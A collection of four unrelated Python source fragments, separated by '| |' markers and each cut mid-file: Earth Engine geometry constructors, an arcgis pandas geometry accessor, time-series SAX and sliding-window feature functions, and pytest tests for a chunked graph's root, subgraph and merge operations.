reach a point at infinity. Otherwise polygons use the left-inside
rule, where interiors are on the left side of the shell's edges when
walking the vertices in the given order. If unspecified, defaults to
True.
*args: For convenience, varargs may be used when all arguments are
numbers. This allows creating EPSG:4326 Polygons given exactly four
coordinates, e.g.
ee.Geometry.Rectangle(minLng, minLat, maxLng, maxLat).
**kwargs: Keyword args that accept "xlo", "ylo", "xhi" and "yhi" for
backward-compatibility.
Returns:
An ee.Geometry describing a rectangular polygon.
"""
init = Geometry._parseArgs('Rectangle', 2, Geometry._GetSpecifiedArgs(
(coords, proj, geodesic, maxError, evenOdd) + args,
('xlo', 'ylo', 'xhi', 'yhi'), **kwargs))
if not isinstance(init, computedobject.ComputedObject):
# GeoJSON does not have a Rectangle type, so expand to a Polygon.
xy = init['coordinates']
if not isinstance(xy, (list, tuple)) or len(xy) != 2:
raise ee_exception.EEException(
'The Geometry.Rectangle constructor requires 2 points or 4 '
'coordinates.')
x1 = xy[0][0]
y1 = xy[0][1]
x2 = xy[1][0]
y2 = xy[1][1]
init['coordinates'] = [[[x1, y2], [x1, y1], [x2, y1], [x2, y2]]]
init['type'] = 'Polygon'
return Geometry(init)
@staticmethod
def LineString(coords=_UNSPECIFIED, proj=_UNSPECIFIED,
geodesic=_UNSPECIFIED, maxError=_UNSPECIFIED,
*args):
"""Constructs an ee.Geometry describing a LineString.
Args:
coords: A list of at least two points. May be a list of coordinates in
the GeoJSON 'LineString' format, a list of at least two ee.Geometry
describing a point, or a list of at least four numbers defining the
[x,y] coordinates of at least two points.
proj: The projection of this geometry. If unspecified, the default is the
projection of the input ee.Geometry, or EPSG:4326 if there are no
ee.Geometry inputs.
geodesic: If false, edges are straight in the projection. If true, edges
are curved to follow the shortest path on the surface of the Earth.
The default is the geodesic state of the inputs, or true if the
inputs are numbers.
maxError: Max error when input geometry must be reprojected to an
explicitly requested result projection or geodesic state.
*args: For convenience, varargs may be used when all arguments are
numbers. This allows creating geodesic EPSG:4326 LineStrings given
an even number of arguments, e.g.
ee.Geometry.LineString(aLng, aLat, bLng, bLat, ...).
Returns:
An ee.Geometry describing a LineString.
"""
all_args = Geometry._GetSpecifiedArgs(
(coords, proj, geodesic, maxError) + args)
return Geometry(Geometry._parseArgs('LineString', | |
"""
Holds Delegate and Accessor Logic
"""
import os
import copy
import uuid
import shutil
import datetime
import tempfile
import pandas as pd
import numpy as np
from ._internals import register_dataframe_accessor, register_series_accessor
from ._array import GeoType
from ._io.fileops import to_featureclass, from_featureclass
from arcgis.geometry import Geometry, SpatialReference, Envelope, Point
############################################################################
def _is_geoenabled(df):
"""
Checks if a Panda's DataFrame is 'geo-enabled'.
This means that a spatial column is defined and is a GeoArray
:returns: boolean
"""
try:
if isinstance(df, pd.DataFrame) and \
hasattr(df, 'spatial') and \
df.spatial.name and \
df[df.spatial.name].dtype.name.lower() == 'geometry':
return True
else:
return False
except:
return False
###########################################################################
@pd.api.extensions.register_series_accessor("geom")
class GeoSeriesAccessor:
"""
"""
_data = None
_index = None
_name = None
#----------------------------------------------------------------------
def __init__(self, obj):
"""initializer"""
self._validate(obj)
self._data = obj.values
self._index = obj.index
self._name = obj.name
#----------------------------------------------------------------------
@staticmethod
def _validate(obj):
if not is_geometry_type(obj):
raise AttributeError("Cannot use 'geom' accessor on objects of "
"dtype '{}'.".format(obj.dtype))
##---------------------------------------------------------------------
## Accessor Properties
##---------------------------------------------------------------------
@property
def area(self):
"""
Returns the features area
:returns: float in a series
"""
res = self._data.area
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def as_arcpy(self):
"""
Returns the features as ArcPy Geometry
:returns: arcpy.Geometry in a series
"""
res = self._data.as_arcpy
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def as_shapely(self):
"""
Returns the features as Shapely Geometry
:returns: shapely.Geometry in a series
"""
res = self._data.as_shapely
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def centroid(self):
"""
Returns the feature's centroid
:returns: tuple (x,y) in series
"""
res = self._data.centroid
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def extent(self):
"""
Returns the feature's extent
:returns: tuple (xmin,ymin,xmax,ymax) in series
"""
res = self._data.extent
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def first_point(self):
"""
Returns the feature's first point
:returns: Geometry
"""
res = self._data.first_point
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def geoextent(self):
"""
A returns the geometry's extents
:returns: Series of Floats
"""
res = self._data.geoextent
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def geometry_type(self):
"""
returns the geometry types
:returns: Series of strings
"""
res = self._data.geometry_type
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def hull_rectangle(self):
"""
A space-delimited string of the coordinate pairs of the convex hull
:returns: Series of strings
"""
res = self._data.hull_rectangle
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def is_empty(self):
"""
Returns True/False if feature is empty
:returns: Series of Booleans
"""
res = self._data.is_empty
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def is_multipart(self):
"""
Returns True/False if features has multiple parts
:returns: Series of Booleans
"""
res = self._data.is_multipart
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def is_valid(self):
"""
Returns True/False if features geometry is valid
:returns: Series of Booleans
"""
res = self._data.is_valid
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def JSON(self):
"""
Returns JSON string of Geometry
:returns: Series of strings
"""
res = self._data.JSON
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def label_point(self):
"""
Returns the geometry point for the optimal label location
:returns: Series of Geometries
"""
res = self._data.label_point
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def last_point(self):
"""
Returns the Geometry of the last point in a feature.
:returns: Series of Geometry
"""
res = self._data.last_point
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def length(self):
"""
Returns the length of the features
:returns: Series of float
"""
res = self._data.length
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def length3D(self):
"""
Returns the length of the features
:returns: Series of float
"""
res = self._data.length3D
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def part_count(self):
"""
Returns the number of parts in a feature's geometry
:returns: Series of Integer
"""
res = self._data.part_count
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def point_count(self):
"""
Returns the number of points in a feature's geometry
:returns: Series of Integer
"""
res = self._data.point_count
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def spatial_reference(self):
"""
Returns the Spatial Reference of the Geometry
:returns: Series of SpatialReference
"""
res = self._data.spatial_reference
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def true_centroid(self):
"""
Returns the true centroid of the Geometry
:returns: Series of Points
"""
res = self._data.true_centroid
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def WKB(self):
"""
Returns the Geometry as WKB
:returns: Series of Bytes
"""
res = self._data.WKB
res.index = self._index
return res
#----------------------------------------------------------------------
@property
def WKT(self):
"""
Returns the Geometry as WKT
:returns: Series of String
"""
res = self._data.WKT
res.index = self._index
return res
##---------------------------------------------------------------------
## Accessor Geometry Method
##---------------------------------------------------------------------
def angle_distance_to(self, second_geometry, method="GEODESIC"):
"""
Returns a tuple of angle and distance to another point using a
measurement type.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
second_geometry Required Geometry. A arcgis.Geometry object.
--------------- --------------------------------------------------------------------
method Optional String. PLANAR measurements reflect the projection of geographic
data onto the 2D surface (in other words, they will not take into
account the curvature of the earth). GEODESIC, GREAT_ELLIPTIC,
LOXODROME, and PRESERVE_SHAPE measurement types may be chosen as
an alternative, if desired.
=============== ====================================================================
:returns: a tuple of angle and distance to another point using a measurement type.
"""
res = self._data.angle_distance_to(**{'second_geometry' : second_geometry,
'method' : method})
res.index = self._index
return res
#----------------------------------------------------------------------
def boundary(self):
"""
Constructs the boundary of the geometry.
:returns: arcgis.geometry.Polyline
"""
res = self._data.boundary()
res.index = self._index
return res
#----------------------------------------------------------------------
def buffer(self, distance):
"""
Constructs a polygon at a specified distance from the geometry.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
distance Required float. The buffer distance. The buffer distance is in the
same units as the geometry that is being buffered.
A negative distance can only be specified against a polygon geometry.
=============== ====================================================================
:returns: arcgis.geometry.Polygon
"""
res = self._data.buffer(**{'distance' : distance})
res.index = self._index
return res
#----------------------------------------------------------------------
def clip(self, envelope):
"""
Constructs the intersection of the geometry and the specified extent.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
envelope required tuple. The tuple must have (XMin, YMin, XMax, YMax) each value
represents the lower left bound and upper right bound of the extent.
=============== ====================================================================
:returns: output geometry clipped to extent
"""
res = self._data.clip(**{'envelope' : envelope})
res.index = self._index
return res
#----------------------------------------------------------------------
def contains(self, second_geometry, relation=None):
"""
Indicates if the base geometry contains the comparison geometry.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
second_geometry Required arcgis.geometry.Geometry. A second geometry
--------------- --------------------------------------------------------------------
relation Optional string. The spatial relationship type.
+ BOUNDARY - Relationship has no restrictions for interiors or boundaries.
+ CLEMENTINI - Interiors of geometries must intersect. Specifying CLEMENTINI is equivalent to specifying None. This is the default.
+ PROPER - Boundaries of geometries must not intersect.
=============== ====================================================================
:returns: boolean
"""
res = self._data.contains(**{'second_geometry' : second_geometry,
'relation' : relation})
res.index = self._index
return res
#----------------------------------------------------------------------
def convex_hull(self):
"""
Constructs the geometry that is the minimal bounding polygon such
that all outer angles are convex.
"""
res = self._data.convex_hull()
res.index = self._index
return res
#----------------------------------------------------------------------
def crosses(self, second_geometry):
"""
Indicates if the two geometries intersect in a geometry of a lesser
shape type.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
second_geometry Required arcgis.geometry.Geometry. A second geometry
=============== ====================================================================
:returns: boolean
"""
res = self._data.crosses(**{'second_geometry' : second_geometry})
res.index = self._index
return res
#----------------------------------------------------------------------
def cut(self, cutter):
"""
Splits this geometry into a part left of the cutting polyline, and
a part right of it.
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
cutter Required Polyline. The cuttin polyline geometry
=============== ====================================================================
:returns: a list of two geometries
"""
res = self._data.cut(**{'cutter' : cutter})
res.index = self._index
return res
#----------------------------------------------------------------------
def densify(self, method, distance, deviation):
"""
Creates a new geometry with added vertices
=============== ====================================================================
**Argument** **Description**
--------------- --------------------------------------------------------------------
method Required String. The type of densification, DISTANCE, ANGLE, or GEODESIC
--------------- --------------------------------------------------------------------
distance Required float. The maximum distance between vertices. The actual
distance between vertices will usually be less than the maximum
distance as new vertices will be evenly distributed along the
original segment. If using a type of DISTANCE or ANGLE, the
distance is measured in the units of the geometry's spatial
reference. If using a type of GEODESIC, the distance is measured
in | |
= numSubseqs
numOutputCols = wordLen
return applyToEachCol(saxify1D, X, numOutputRows, numOutputCols,
length, wordLen, cardinality)
# ------------------------ sparse sax words
def sparseSaxify1D(seq, length, wordLen, cardinality):
words = saxify1D(seq, length, wordLen, cardinality)
return sparsifySaxWords(words, cardinality)
def sparseSaxify(X, length, wordLen, cardinality):
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
numOutputCols = wordLen * cardinality
return applyToEachCol(sparseSaxify1D, X, numOutputRows, numOutputCols,
length, wordLen, cardinality)
# ------------------------ sax hashes
def sparseSaxHash1D(seq, length, wordLen, cardinality, noZeroCols=True):
saxWords = saxify1D(seq, length, wordLen, cardinality)
return sparseSaxHashes(saxWords, cardinality, noZeroCols=noZeroCols)
def sparseSaxHashify(X, length, wordLen, cardinality):
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
numOutputCols = cardinality ** wordLen
# print "sparseSaxHashify: numOutputCols = {}".format(numOutputCols)
return applyToEachCol(sparseSaxHash1D, X, numOutputRows, numOutputCols,
length, wordLen, cardinality, noZeroCols=False)
# ------------------------------------------------ Variance
def runningVariance1D(seq):
n = len(seq)
out = np.empty(n)
monitor = RunningVariance()
for i in range(n):
monitor.update(seq[i])
out[i] = monitor.SSE / (i+1)
return out
def slidingVariance1D(seq, length):
n = len(seq)
numSubseqs = n - length + 1
out = np.empty(numSubseqs)
monitor = SlidingVariance()
# monitor = SlidingVariance2()
monitor.initialize(seq[:length])
out[0] = monitor.variance
for i in range(length, n):
oldX, newX = seq[i - length], seq[i]
monitor.update(oldX, newX)
# monitor.update(seq[i])
# out[i - length + 1] = monitor.SSE
out[i - length + 1] = monitor.variance
# return out / length
return out
def slidingVariance(X, length):
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
numOutputCols = 1
return applyToEachCol(slidingVariance1D, X, numOutputRows, numOutputCols, length)
def sparseVariance(X, length, breakpoints=None):
if breakpoints is None:
breakpoints = np.linspace(0., 1., 9)[1:-1] # 7 breakpoints, 8 levels
# breakpoints = saxBreakpoints(8)
# compute variance for each sliding window position
variance = slidingVariance(X, length).T
variance /= np.max(variance) # set max variance to 1 for quantization
variance = ar.zNormalizeCols(variance)
# quantize and one-hot-encode variances
quantized = quantize(variance, breakpoints)
cardinality = len(breakpoints) + 1
numOutputRows = len(quantized)
numOutputCols = cardinality
out = applyToEachCol(oneHotCodeFromIndices, quantized, numOutputRows,
numOutputCols, cardinality=cardinality)
# zero out places with like no variance
# out[..., 0] = 0
return out
# ------------------------------------------------ Normalization
def slidingNormalize1D(seq, length, whichPoint='middle'):
n = len(seq)
numSubseqs = n - length + 1
out = np.empty(numSubseqs)
monitor = SlidingNormalizer()
monitor.initialize(seq[:length])
if whichPoint == 'first': # normalize first point in window
out[0] = monitor.normalize(seq[0])
for i in range(length, n):
oldX, newX = seq[i - length], seq[i]
monitor.update(oldX, newX)
out[i - length + 1] = monitor.normalize(seq[i - length + 1])
elif whichPoint == 'last': # normalize last point in window
out[0] = monitor.normalize(seq[0])
for i in range(length, n):
oldX, newX = seq[i - length], seq[i]
monitor.update(oldX, newX)
out[i - length + 1] = monitor.normalize(seq[i])
else: # normalize middle point in window
halfLen = int(length/2)
out[0] = monitor.normalize(seq[length - halfLen])
for i in range(length, n):
oldX, newX = seq[i - length], seq[i]
monitor.update(oldX, newX)
out[i - length + 1] = monitor.normalize(seq[i - halfLen])
return out
def slidingNormalize(X, length):
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
numOutputCols = 1
return applyToEachCol(slidingNormalize1D, X, numOutputRows, numOutputCols, length)
# ------------------------------------------------ Quantization
def quantize(X, breakpoints):
if len(X.shape) == 1:
return np.digitize(X, breakpoints)
X = np.array(X, dtype=np.int)
for i, row in enumerate(X):
X[i] = np.digitize(row, breakpoints)
return X
# return np.digitize(X, breakpoints)
# if len(X.shape) > 1:
# numOutputRows, numOutputCols = X.shape
# else:
# numOutputRows, numOutputCols = len(X), 1
# return applyToEachCol(np.digitize, X, numOutputRows, numOutputCols, breakpoints)
def normalizeAndSparseQuantize1D(X, length, breakpoints=None):
normed = slidingNormalize1D(X, length)
if breakpoints is None:
normed = ar.zeroOneScaleMat(normed)
breakpoints = np.linspace(0, 1, 9)[1:-1] # 8 levels
# normed = ar.zNormalize(normed)
# breakpoints = saxBreakpoints(8)
quantized = quantize(normed, breakpoints)
cardinality = len(breakpoints) + 1
return oneHotCodeFromIndices(quantized, cardinality)
def normalizeAndSparseQuantize(X, length, breakpoints=None):
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
if breakpoints is None:
numOutputCols = 8
else:
numOutputCols = len(breakpoints) + 1
return applyToEachCol(normalizeAndSparseQuantize1D, X,
numOutputRows, numOutputCols, length, breakpoints)
# ------------------------------------------------ Line
# @jit
def lineProjection1D(seq, length):
n = len(seq)
numSubseqs = n - length + 1
correlations = np.empty(numSubseqs)
slopes = np.empty(numSubseqs)
proj = SlidingStraightLineProjection()
proj.initialize(seq[:length])
correlations[0] = proj.r
slopes[0] = proj.slope
for i in range(length, n):
oldX, newX = seq[i - length], seq[i]
proj.update(oldX, newX)
correlations[i - length + 1] = proj.r
slopes[i - length + 1] = proj.slope
return correlations, slopes
# @jit
# def lineProject(X, length):
# numSubseqs = len(X) - length + 1
# numOutputRows = numSubseqs
# numOutputCols = 1
# return applyToEachCol(lineProjection1D, X, numOutputRows, numOutputCols, length)
def sparseLineProjection1D(seq, length, breakpoints, maxFilter=False, ignoreFlat=False):
corrs, slopes = lineProjection1D(seq, length)
increases = slopes * length
numSubseqs = len(corrs)
numBreakpoints = len(breakpoints)
cardinality = 2 * numBreakpoints + 1
signs = 2 * (corrs >= 0) - 1
indices = np.digitize(increases * signs, breakpoints) * signs + numBreakpoints
out = np.zeros((numSubseqs, cardinality))
# if maxFilter is true, we use the indices associated with whichever point
# best explains this time step at this length, as measured by |correlation|
if maxFilter:
# import matplotlib.pyplot as plt
# plt.figure()
# plt.plot(np.abs(corrs))
# plt.plot(indices)
maxIdxs = ar.slidingMaximaIdxs(np.abs(corrs), length // 2, pastEnd=True)
indices = indices[maxIdxs]
# plt.plot(indices)
# plt.show()
allRowsIdxs = np.arange(numSubseqs, dtype=np.int)
# if False:
if ignoreFlat:
zeroIdx = numBreakpoints
# whereFlat = np.where(indices == zeroIdx)[0]
# corrs[whereFlat] = 0.
whereNotFlat = np.where(indices != zeroIdx)[0]
allRowsIdxs = allRowsIdxs[whereNotFlat]
indices = indices[whereNotFlat]
corrs = corrs[whereNotFlat]
out[allRowsIdxs, indices] = np.abs(corrs)
return out
def sparseLineProject(X, length, breakpoints, **kwargs):
# TODO allow different breakpoints across dims
numSubseqs = len(X) - length + 1
numOutputRows = numSubseqs
numOutputCols = 2 * len(breakpoints) + 1
return applyToEachCol(sparseLineProjection1D, X, numOutputRows,
numOutputCols, length, breakpoints, **kwargs)
def defaultSparseLineBreakpoints(X, scaleHowMany=1, cardinality=8, logScale=False):
minVals, maxVals = np.min(X, axis=0), np.max(X, axis=0)
valRange = np.max(maxVals - minVals) # biggest range of any dimension
# minVariance = valRange / 100.
if logScale:
minVariance = valRange / 100.
numBreakpoints = int(np.ceil(np.log2(valRange) - np.log2(minVariance)))
numBreakpoints *= scaleHowMany
return np.logspace(np.log2(minVariance), np.log2(valRange), num=numBreakpoints, base=2.)
else:
return np.linspace(0, valRange, cardinality+1)[1:-1] # 7 breakpoints -> 8 levels
# ------------------------------------------------ Neighbors
def randChoice(a, size=1, replace=True, p=None):
"""
Wrapper for numpy random.choice that deals with zero probabilities (in p)
"""
if p is None or not len(p):
return np.random.choice(a, size, replace)
nonzeroProbIdxs = p > 0
numNonzeroProbs = np.sum(nonzeroProbIdxs)
if numNonzeroProbs == 0 or (numNonzeroProbs < size and not replace):
raise ValueError("randChoice(): fewer nonzero probabilities"
"({}) than requested size ({})".format(numNonzeroProbs, size))
p = p[nonzeroProbIdxs]
a = a[nonzeroProbIdxs]
size = min(size, len(a))
return np.random.choice(a, size, replace, p)
def randIdxs(length, num, minSpacing=1, probabilities=None,
reduceSpacingIfNeeded=False, reduceNumIfNeeded=False):
"""
Returns `num` unique indices within ``[0, length)``; probabilities of selecting
each index can be specified with `probabilities`, and a desired minimum
spacing between indices (not guaranteed) can be specified with `minSpacing`.
If `reduceSpacingIfNeeded` is True, minSpacing will be set to a smaller
value when it is not possible to return `num` samples `minSpacing` indices
apart.
"""
hasProbs = probabilities is not None and len(probabilities)
if hasProbs and len(probabilities) != length:
raise ValueError("Probabilities have length"
"{} != requested length {}".format(len(probabilities), length))
# convert fractional minSpacing and ensure that it's an int >= 1
if 0. <= minSpacing < 1.:
minSpacing *= length
minSpacing = int(max(1, minSpacing))
neededLength = (num - 1) * minSpacing + 1
if neededLength > length:
if reduceSpacingIfNeeded:
minSpacing = int((length - 1) / (num - 1))
elif reduceNumIfNeeded:
num = neededLength // minSpacing + 1
else:
raise ValueError("cannot return {} indices out of {} with minSpacing {}".format(
num, length, minSpacing))
if hasProbs and len(probabilities) != length:
raise ValueError("Probabilities vector had length {}, not {}".format(
len(probabilities), length))
# if too many samples requested to bother spacing them, just sample
# directly from the set of possible idxs
# if minSpacing == 1:
# idxs = np.random.choice(np.arange(length), num,
# replace=False, p=probabilities)
# return np.sort(idxs.astype(np.intp)) # TODO don't sort for speed
# sum together the probabilities of every minSpacing adjacent points
probs = probabilities if hasProbs else None
if minSpacing > 1:
remainder = length % minSpacing
padLen = (minSpacing - remainder) % minSpacing # mod in case remainder=0
probsReshape = np.append(probs, np.zeros(padLen))
# print "length, remainder, minSpacing, padLen = ", length, remainder, minSpacing, padLen
probsReshape = probsReshape.reshape((-1, minSpacing))
probs = np.sum(probsReshape, axis=1)
# compute the (rough) idxs; we divide by minSpacing before deciding
# and then multiply by minSpacing so that the points are at least
# minSpacing apart
allIdxs = np.arange(np.ceil(length / float(minSpacing)), dtype=np.intp)
idxs = randChoice(allIdxs, num, replace=False, p=probs)
# print "len(allIdxs), len(probs)", len(allIdxs), len(probs)
# print "length, minSpacing, ceil(len/minSpacing)", length, minSpacing, np.ceil(length / minSpacing)
# print "num nonzero probs:", np.sum(probs > 0)
# random.choice can't deal with probabilities of zero
# nonzeroProbIdxs = probs > 0
# probs = probs[nonzeroProbIdxs]
# allIdxs = allIdxs[nonzeroProbIdxs]
# num = min(num, len(allIdxs))
# # print "num, len(allIdxs), len(probs)", num, len(allIdxs), len(probs)
# # print "num nonzero probs:", np.sum(probs > 0)
# idxs = np.random.choice(allIdxs, num, replace=False, p=probs)
# add offset to each idx so that we don't always return multiples
# of minSpacing
probs = probabilities if hasProbs else np.ones(length) / length # uniform
if minSpacing > 1:
idxs *= minSpacing
allOffsetIdxs = np.arange(minSpacing)
for i, idx in enumerate(idxs):
offsetProbs = probs[idx:idx+minSpacing]
offsetProbs /= np.sum(offsetProbs)
possibleIdxs = allOffsetIdxs[:len(offsetProbs)] # edge case if near end
offset = randChoice(possibleIdxs, replace=True, p=offsetProbs)
idxs[i] += int(offset)
# return idxs.astype(np.intp)
return np.sort(idxs.astype(np.intp)) # TODO don't sort for speed
@jit
def pairwiseDists(X):
numSubseqs = len(X)
allVariances = np.var(X, axis=1)
allDists = np.zeros((numSubseqs, numSubseqs))
for i in range(numSubseqs):
variance = allVariances[i]
for j in range(i+1, numSubseqs):
diff = X[i] - X[j]
# absDiff = np.abs(diff)
# allDists[i, j] = np.sum(absDiff * absDiff)
# allDists[i, j] = np.sum(np.abs(diff))
allDists[i, j] = np.sum(diff * diff) / variance
# allDists[i, j] = np.sum(diff * diff)
# allDists[i, j] = i + j
allDists += allDists.T
# ignore self-similarity
diagIdxs = np.arange(numSubseqs)
allDists[[diagIdxs, diagIdxs]] = X.shape[1] * np.max(allVariances)
return allDists
def neighborSims1D(seq, length, numNeighbors=100, samplingAlgo='walk',
similarityAlgo='meanOnly', maxDist=.25, localMaxFilter=False,
spacedMaxFilter=False, tryNumNeighbors=-1, **sink):
# spacedMaxFilter=True, tryNumNeighbors=-1, **sink):
# print "neighborSims1D(); seq shape, requested len, requested | |
children2_combined)) and \
np.all(np.isin(children22001, children2_combined))
@pytest.mark.timeout(30)
def test_get_root(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root10000 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0),
time_stamp=None)
root11000 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0),
time_stamp=None)
root11001 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1),
time_stamp=None)
root12000 = cgraph.get_root(to_label(cgraph, 1, 2, 0, 0, 0),
time_stamp=None)
with pytest.raises(Exception) as e:
cgraph.get_root(0)
assert (root10000 == to_label(cgraph, 4, 0, 0, 0, 1) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 2)) or \
(root10000 == to_label(cgraph, 4, 0, 0, 0, 2) and
root11000 == root11001 == root12000 == to_label(
cgraph, 4, 0, 0, 0, 1))
@pytest.mark.timeout(30)
def test_get_subgraph_nodes(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes_1 = cgraph.get_subgraph_nodes(root1)
lvl1_nodes_2 = cgraph.get_subgraph_nodes(root2)
assert len(lvl1_nodes_1) == 1
assert len(lvl1_nodes_2) == 3
assert to_label(cgraph, 1, 0, 0, 0, 0) in lvl1_nodes_1
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes_2
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes_2
assert to_label(cgraph, 1, 2, 0, 0, 0) in lvl1_nodes_2
lvl2_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[2])
lvl2_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[2])
assert len(lvl2_nodes_1) == 1
assert len(lvl2_nodes_2) == 2
assert to_label(cgraph, 2, 0, 0, 0, 1) in lvl2_nodes_1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes_2
assert to_label(cgraph, 2, 2, 0, 0, 1) in lvl2_nodes_2
lvl3_nodes_1 = cgraph.get_subgraph_nodes(root1, return_layers=[3])
lvl3_nodes_2 = cgraph.get_subgraph_nodes(root2, return_layers=[3])
assert len(lvl3_nodes_1) == 1
assert len(lvl3_nodes_2) == 2
assert to_label(cgraph, 3, 0, 0, 0, 1) in lvl3_nodes_1
assert to_label(cgraph, 3, 0, 0, 0, 2) in lvl3_nodes_2
assert to_label(cgraph, 3, 1, 0, 0, 1) in lvl3_nodes_2
lvl4_node = cgraph.get_subgraph_nodes(root1, return_layers=[4])
assert len(lvl4_node) == 1
assert root1 in lvl4_node
layers = cgraph.get_subgraph_nodes(root2, return_layers=[1, 4])
assert len(layers) == 2 and 1 in layers and 4 in layers
assert len(layers[4]) == 1 and root2 in layers[4]
assert len(layers[1]) == 3
assert to_label(cgraph, 1, 1, 0, 0, 0) in layers[1]
assert to_label(cgraph, 1, 1, 0, 0, 1) in layers[1]
assert to_label(cgraph, 1, 2, 0, 0, 0) in layers[1]
lvl2_nodes = cgraph.get_subgraph_nodes(root2, return_layers=[2],
bounding_box=[[1, 0, 0], [2, 1, 1]],
bb_is_coordinate=False)
assert len(lvl2_nodes) == 1
assert to_label(cgraph, 2, 1, 0, 0, 1) in lvl2_nodes
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
lvl1_nodes = cgraph.get_subgraph_nodes(lvl2_parent)
assert len(lvl1_nodes) == 2
assert to_label(cgraph, 1, 1, 0, 0, 0) in lvl1_nodes
assert to_label(cgraph, 1, 1, 0, 0, 1) in lvl1_nodes
@pytest.mark.timeout(30)
def test_get_subgraph_edges(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
root1 = cgraph.get_root(to_label(cgraph, 1, 0, 0, 0, 0))
root2 = cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(root1)
assert len(edges) == 0 and len(affinities) == 0 and len(areas) == 0
edges, affinities, areas = cgraph.get_subgraph_edges(root2)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
# assert len(edges) == 2 and len(affinities) == 2 and len(areas) == 2
lvl2_parent = cgraph.get_parent(to_label(cgraph, 1, 1, 0, 0, 0))
edges, affinities, areas = cgraph.get_subgraph_edges(lvl2_parent)
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 1)] in edges or \
[to_label(cgraph, 1, 1, 0, 0, 1),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert [to_label(cgraph, 1, 1, 0, 0, 0),
to_label(cgraph, 1, 2, 0, 0, 0)] in edges or \
[to_label(cgraph, 1, 2, 0, 0, 0),
to_label(cgraph, 1, 1, 0, 0, 0)] in edges
assert len(edges) == 2
@pytest.mark.timeout(30)
def test_get_subgraph_nodes_bb(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
bb = np.array([[1, 0, 0], [2, 1, 1]], dtype=np.int)
bb_coord = bb * cgraph.chunk_size
childs_1 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb)
childs_2 = cgraph.get_subgraph_nodes(cgraph.get_root(to_label(cgraph, 1, 1, 0, 0, 1)), bounding_box=bb_coord, bb_is_coordinate=True)
assert np.all(~(np.sort(childs_1) - np.sort(childs_2)))
@pytest.mark.timeout(30)
def test_get_atomic_partners(self, gen_graph_simplequerytest):
cgraph = gen_graph_simplequerytest
class TestGraphMerge:
@pytest.mark.timeout(30)
def test_merge_pair_same_chunk(self, gen_graph):
"""
Add edge between existing RG supervoxels 1 and 2 (same chunk)
Expected: Same (new) parent for RG 1 and 2 on Layer two
┌─────┐ ┌─────┐
│ A¹ │ │ A¹ │
│ 1 2 │ => │ 1━2 │
│ │ │ │
└─────┘ └─────┘
"""
cgraph = gen_graph(n_layers=2)
# Preparation: Build Chunk A
fake_timestamp = datetime.utcnow() - timedelta(days=10)
create_chunk(cgraph,
vertices=[to_label(cgraph, 1, 0, 0, 0, 0), to_label(cgraph, 1, 0, 0, 0, 1)],
edges=[],
timestamp=fake_timestamp)
# Merge
new_root_ids = cgraph.add_edges("<NAME>", [to_label(cgraph, 1, 0, 0, 0, 1), to_label(cgraph, 1, 0, 0, 0, 0)], affinities=0.3)
assert len(new_root_ids) == 1
